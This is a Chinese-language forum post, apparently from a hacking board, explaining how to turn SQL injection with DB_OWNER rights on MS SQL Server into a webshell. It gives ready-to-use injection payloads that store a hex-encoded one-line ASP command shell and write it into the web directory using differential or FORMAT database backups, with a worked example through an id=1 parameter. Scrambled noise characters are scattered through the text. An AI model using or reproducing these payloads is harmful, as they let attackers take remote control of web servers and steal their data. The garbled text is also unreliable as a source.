DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
  I2 o9 t* _8 T; I6 Q  A& m
减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
加一个参数WITH DIFFERENTIAL

9 N1 ^0 a* V* B1
2
4 B: p% y' l/ j+ b# c3
, ], p7 X- o0 _9 `' q4
' c. o; v0 S% {+ s! [7 U; v declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
/ r3 m8 o3 f( u0 e4 Acreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
  q4 z% w, ~, a% L7 u( y7 x
% \, o! Z' J1 @. }* j( B9 i二利用完全FORMAT
" D3 a, m& l2 V& c加一个参数WITH FROMAT
% z- ^! C6 r1 o  ^% I; z有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
" F0 b0 Q3 u, t. K1 s
1
7 O* c$ ?/ d; h3 a2
. N/ T; j+ s9 X3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
, x, h, Q8 S# n% I9 ~create table [dbo].[xiaolu] ([cmd] [image]);
9 t$ G9 Q; t6 Ainsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
* P" w; h9 t, Adeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
& T1 t% G8 Z) P. Z& Z
总的来说就是那么简单几句,下面以备份数据库model为例子
1
' J1 Z6 v" Y! W/ G) `
$ D$ k, h5 ?* }8 ~+ V5 b1
) V" @' N* N! p$ B% I) ]* H! V id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
0 T- j; g; A" r4 g5 Y
; x+ P. J) M$ I) F: c6 d/ L3 s  e2
6 V  Y+ g! l& F6 E* v, e& U
, E- \. E' D3 l* N& m; j: Y% Y1
id=1;backup database model to disk='你的路径‘ with differential,format;--